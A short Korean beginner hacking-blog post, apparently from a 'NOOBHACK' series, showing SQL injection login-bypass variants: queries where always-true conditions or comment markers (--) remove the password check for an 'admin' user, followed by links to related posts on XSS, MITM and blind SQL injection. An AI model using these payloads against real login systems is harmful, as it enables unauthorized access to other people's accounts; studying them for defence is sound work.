전에는 SQL과 DB(DataBase)에 대해 알아 보았다 그리고 이를 악용한 SQL injection에 대해서도 간단히 알아보았다
SELECT * FROM members WHERE uid="admin" and upw="" or "1"
하지만 이것 외에도 uid 혹은 upw가 참인 다른 공격 방식이 있다
SELECT * FROM members WHERE uid="admin" and upw="" or "1"="1"
SELECT * FROM members WHERE uid="admin" and upw="" or 1 -- " (--는 주석처리를 뜻 한다)
SELECT * FROM members WHERE uid="admin" --" and upw=""(upw 조건문을 주석처리 함)
등등 여러가지 응용 방법이 있다 하지만 이것을 더욱 활용하려면 SQL를 집적적으로 공부 하는 수 밖에 없을 것이다
그러면 더더욱 많은 활용기법과 취약점을 찾을 수 있을 것이다
'해킹 공격' 카테고리의 다른 글
| [NOOBHACK] XSS 공격 기법 (0) | 2022.08.16 |
|---|---|
| [NOOBHACK] 중간자 공격 MITM (0) | 2022.08.15 |
| [NOOBHACK] blind SQL injection 공격 기법 (BLIND) (0) | 2022.08.05 |
| [NOOBHACK] 사이트에서 SQL injection 해보기 (0) | 2022.08.04 |
| [NOOBHACK] DDS로 사이트 깽판 치는 방법 (0) | 2022.08.04 |
